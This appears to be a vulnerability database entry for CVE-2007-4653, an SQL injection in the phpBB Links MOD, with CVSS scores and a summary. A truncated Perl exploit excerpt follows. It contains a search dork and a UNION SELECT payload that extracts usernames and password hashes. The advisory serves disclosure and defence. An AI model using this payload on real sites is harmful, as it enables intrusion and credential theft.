7.5
CVSSv2

CVE-2007-4653

Published: 04/09/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in links.php in the Links MOD 1.2.2 and previous versions for phpBB 2.0.22 and previous versions allows remote malicious users to execute arbitrary SQL commands via the start parameter in a search action.

Vulnerable Product Search on Vulmon Subscribe to Product

phpbb phpbb

Exploits

#!/usr/bin/perl print q{ phpBB <= 2022 - Links MOD <= v122 Remote SQL Injection Exploit Bug discovered by Don Dork: allinurl:linksphp?t=search or: "Links MOD v122 by phpBB2de" SQL INJECTION: Exploit: linksphp?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%2 ...